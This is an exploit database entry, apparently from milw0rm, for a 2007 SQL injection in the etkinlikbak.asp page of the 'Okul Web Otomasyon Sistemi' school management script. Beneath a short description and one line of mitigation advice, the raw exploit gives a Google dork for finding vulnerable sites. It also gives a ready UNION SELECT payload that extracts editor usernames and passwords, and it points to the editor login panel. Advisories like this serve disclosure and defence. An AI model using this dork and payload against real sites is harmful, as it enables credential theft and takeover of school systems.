Vendor: Okul Web Otomasyon Sistemi
By: milw0rm.com
CVSS: 5.5 (MEDIUM)
Vulnerability type: SQL Injection
CWE: 89
Product Name: Okul Web Otomasyon Sistemi
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Script: Okul Web Otomasyon Sistemi

The etkinlikbak.asp script is vulnerable to SQL Injection. An attacker can exploit this vulnerability by injecting SQL code in the 'id' parameter of the URL to retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL injection attacks.

Exploit-DB raw data:

-------------------------------------------------------------------------------------------------------------------
AYYILDIZ.ORG PreSents...

 
Script: Okul Web Otomasyon Sistemi
Script Download: http://www.aspindir.com/Goster/3822
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
 
DORK: inurl:etkinlikbak.asp
-------------------------------------------------------------------------------------------------------------------
Exploit:  etkinlikbak.asp?id=-1%20union%20select%200,editor,sifre,3,4,5%20from%20editor
-------------------------------------------------------------------------------------------------------------------
Editor Panel: editor_gir.asp
-------------------------------------------------------------------------------------------------------------------
 
Tnx:H0tturk,Dr.Max Virus,,PcDelisi,CodeR,Dumenci
Special Tnx:Asianeagle, AYYILDIZ.ORG

# milw0rm.com [2007-01-15]